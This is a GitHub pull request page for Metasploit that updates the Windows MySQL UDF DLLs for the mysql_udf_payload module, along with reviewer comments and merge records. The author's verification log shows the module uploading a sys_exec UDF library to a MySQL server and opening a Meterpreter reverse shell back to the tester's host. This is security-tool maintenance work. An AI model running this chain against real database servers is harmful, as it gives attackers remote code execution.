updated windows mysql udf files and documentation by h00die · Pull Request #10428 · rapid7/metasploit-framework

h00die · 2018-08-07T18:55:53Z

Updates binaries (.dll files) from upstream sqlmapproject.
Adds documentation to properly attribute @stamparm, sqlmap, where the binaries came from, and the ticket with the reference to them being de-cloaked, and therefore hashes wont match what is in sqlmap.

I verified the 64bit dll, but not the 32bit.

Verification

List the steps needed to make sure this thing works

Heres my verification of 64bit on win2k12.

msf5 exploit(multi/mysql/mysql_udf_payload) > run

[*] Started reverse TCP handler on 1.1.1.1:8989 
[*] 2.2.2.2:3306 - Checking target architecture...
[*] 2.2.2.2:3306 - Checking for sys_exec()...
[*] 2.2.2.2:3306 - Checking target architecture...
[*] 2.2.2.2:3306 - Checking for MySQL plugin directory...
[*] 2.2.2.2:3306 - Target arch (win64) and target path both okay.
[*] 2.2.2.2:3306 - Uploading lib_mysqludf_sys_64.dll library to C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/uGPBcbne.dll...
[*] 2.2.2.2:3306 - Checking for sys_exec()...
[*] 2.2.2.2:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
[*] 2.2.2.2:3306 - Command Stager progress -   2.93% done (2998/102246 bytes)
[*] 2.2.2.2:3306 - Command Stager progress -   4.40% done (4497/102246 bytes)
[*] 2.2.2.2:3306 - Command Stager progress -   5.86% done (5996/102246 bytes)
[*] 2.2.2.2:3306 - Command Stager progress -  98.19% done (100400/102246 bytes)
[*] 2.2.2.2:3306 - Command Stager progress -  99.59% done (101827/102246 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] 2.2.2.2:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:8989 -> 2.2.2.2:49170) at 2018-08-06 21:19:26 -0400

meterpreter > sysinfo
Computer        : WIN-OBKF2JFCDKL
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

h00die · 2018-09-23T22:39:17Z

@sethjackson you originally requested this, got time to take a look?

sethjackson · 2018-09-24T12:11:12Z

Sure. Let me check this out and get back to you.

sethjackson · 2018-09-24T13:26:12Z

I tried the 64-bit library with the following configuration:

Windows Server 2008 R2 Standard 64-bit
MySQL 5.7.21 64-bit
The 64-bit UDF from this PR

and the server no longer crashed given the original reproduction steps.

So this looks good to me.

Thanks!

h00die · 2018-09-24T20:44:38Z

@wvu-r7 @bcook-r7 I know you two are always super busy, any junior members who want to take this to land?

wvu · 2018-09-24T20:47:32Z

@h00die: Everyone is busy, mate. I'm forwarding to the team in case anyone wants to try. Thanks.

busterb · 2018-09-25T02:12:26Z

Worked for me, thanks.

busterb · 2018-09-25T02:13:35Z

Release Notes

This fix updates the binaries for the multi/mysql/mysql_udf_payload module and gives proper attribution to the sqlmap project.

h00die · 2018-09-25T09:17:28Z

Thanks @busterb !

updated windows udf files and documentation

d299831

h00die added docs bug labels Aug 7, 2018

busterb self-assigned this Sep 24, 2018

busterb merged commit d299831 into rapid7:master Sep 25, 2018

busterb added a commit that referenced this pull request Sep 25, 2018

Land #10428, Update Windows MySQL UDF files, add docs

1607c2b

msjenkins-r7 pushed a commit that referenced this pull request Sep 25, 2018

Land #10428, Update Windows MySQL UDF files, add docs

bff3047

gdavidson-r7 added the rn-fix release notes fix label Oct 10, 2018

h00die deleted the mysql branch November 15, 2018 22:06

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

updated windows mysql udf files and documentation#10428

updated windows mysql udf files and documentation#10428
busterb merged 1 commit intorapid7:masterfrom
h00die:mysql

h00die commented Aug 7, 2018 •

edited by busterb

Loading

Uh oh!

h00die commented Sep 23, 2018

Uh oh!

sethjackson commented Sep 24, 2018

Uh oh!

sethjackson commented Sep 24, 2018

Uh oh!

h00die commented Sep 24, 2018

Uh oh!

wvu commented Sep 24, 2018

Uh oh!

busterb commented Sep 25, 2018

Uh oh!

busterb commented Sep 25, 2018 •

edited by gdavidson-r7

Loading

Uh oh!

h00die commented Sep 25, 2018

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

5 participants

Conversation

h00die commented Aug 7, 2018 • edited by busterb Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Verification

Uh oh!

h00die commented Sep 23, 2018

Uh oh!

sethjackson commented Sep 24, 2018

Uh oh!

sethjackson commented Sep 24, 2018

Uh oh!

h00die commented Sep 24, 2018

Uh oh!

wvu commented Sep 24, 2018

Uh oh!

busterb commented Sep 25, 2018

Uh oh!

busterb commented Sep 25, 2018 • edited by gdavidson-r7 Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Release Notes

Uh oh!

h00die commented Sep 25, 2018

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

5 participants

h00die commented Aug 7, 2018 •

edited by busterb

Loading

busterb commented Sep 25, 2018 •

edited by gdavidson-r7

Loading